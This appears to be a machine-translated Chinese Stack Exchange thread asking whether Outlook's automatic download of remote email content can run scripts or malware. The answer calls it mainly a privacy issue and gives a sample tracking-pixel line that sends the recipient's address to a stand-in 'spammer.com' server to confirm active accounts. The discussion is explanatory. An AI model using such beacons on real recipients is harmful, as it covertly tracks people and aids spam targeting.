在Outlook中,當我們收到來自未知源的入站郵件時,郵件頂部的工具欄允許我們將發件人永久添加到安全發件人列表或一次性「下載內容「自動執行電子郵件中的Javascript或惡意代碼
不同的人一直在設置」從任何來源自動下載「的配置......我們建議他們不要這樣做。
微軟網站指出,HTML內容,腳本或圖像可以用作「信標」,以向個人Web服務器報告該電子郵件地址有效。
如果只是通過查看或預覽,電子郵件可以POST到Web服務器,是否有可能也執行JS或其他惡意代碼,如果HTML /圖像以這種方式下載?
不在電子郵件中顯示圖像更多的是由您的電子郵件客戶端採用的反垃圾郵件政策(其中大多數現在默認爲這樣做)。
如果我例如是找一幫活躍的電子郵件帳戶我只是隨機發送使用此格式的消息:
to: [email protected]
message: <img src="http://spammer.com/[email protected]">
然後我可以在spammer.com設置我的Web服務器記錄收到的請求(同時提供圖像),以便每次用戶打開我的一個惡意電子郵件時,我可以確保該用戶處於活動狀態,因此能夠避免浪費我的資源在閒置或不存在的帳戶上發送垃圾郵件。
但同樣,這是關於策略問題,而不是安全威脅,對於電子郵件可能嘗試加載的任何外部資源(比如樣式表)也是如此。
JS通常在郵件客戶端中甚至不可用,所以沒有真正的威脅來自該方面。
如果Outlook中存在任何缺陷,則[預覽窗格可能觸發惡意軟件](http://security.stackexchange.com/questions/60744/can-malware-be-activated-by-previewing-email-in -outlooks-preview-pane),無論從任何源設置下載。這通常不會讓用戶通過Internet Explorer訪問網站,所以不要讓這個報警。從任何來源下載更多的是隱私問題,而不是安全威脅。 – SilverlightFox 2014-11-05 11:30:13